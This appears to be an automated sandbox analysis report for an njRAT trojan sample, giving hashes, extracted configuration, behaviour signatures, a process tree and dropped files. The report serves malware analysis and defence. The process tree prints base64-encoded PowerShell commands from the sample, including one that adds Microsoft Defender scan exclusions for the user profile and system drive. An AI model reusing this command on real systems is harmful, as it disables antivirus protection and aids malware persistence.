Overview

overview

10

Static

static

3

filetest.exe

windows7-x64

10

filetest.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 05:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    filetest.exe

  • Size

    33KB

  • MD5

    ef59fb3c39255044648423954f1da668

  • SHA1

    45cf2370789c5314fa2c57221ca02b6ef877be60

  • SHA256

    ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a

  • SHA512

    907aefa515e7df8dd215f57ec47d96e79cf5b63b0a4e7aeb81ed8ce2540796dd4281ce46d3b06b4bda4c250aec6bd62b83b5018979cea064fa7f37fd7e55f101

  • SSDEEP

    768:uR5KrKvDIAuBtvoY2vIP0S9QY3UuTWUSX94HPy8R9:rKvMnf2Ie+U1NX94vy8/

Score
10/10
njrathackeddefense_evasiontrojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

Mutex

ee714fb89d1a0ba22c66b8980599112e

Attributes
  • reg_key

    ee714fb89d1a0ba22c66b8980599112e

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 25 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\filetest.exe
    "C:\Users\Admin\AppData\Local\Temp\filetest.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1132
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      PID:4008
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\nudes
      2⤵
        PID:428

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      614f88cf39eb3223246afec4bf1463b4

      SHA1

      74d738ee6fdada75ac1ef1645073005e3f6b6cfb

      SHA256

      021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

      SHA512

      84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4b90550f375afbfd1b52d0731e835b52

      SHA1

      e07b218b14743ada74fb88d4109c7acaa83e5e07

      SHA256

      61787abb9fc57fdae394e0d5c15470ff78c4b97b9ebd77cd8ca1019c13a0c403

      SHA512

      a91918a888cdddc5d73c638d59276060461df2eee1b99d72f1c9478fd7888d3a8552ca6fdcdc219fa6e3b206c3ca32043ac1e64dcacb0a3b4bbb6820bc69718b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      Filesize

      24KB

      MD5

      fa9439d61c3c28bb92a75095cf39d6bc

      SHA1

      a959b37a215b1417e72fb7df722e9cecd8f29629

      SHA256

      5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8

      SHA512

      49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guzpaa3r.1do.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/916-13-0x000001C544B50000-0x000001C544B72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/916-14-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/916-15-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/916-18-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/916-8-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1948-0-0x00007FFC001D3000-0x00007FFC001D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1948-19-0x00007FFC001D3000-0x00007FFC001D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1948-20-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1948-2-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1948-35-0x00007FFC001D0000-0x00007FFC00C91000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1948-1-0x0000000000CF0000-0x0000000000CFE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4008-33-0x0000000000E00000-0x0000000000E0C000-memory.dmp

      Filesize

      48KB

      Download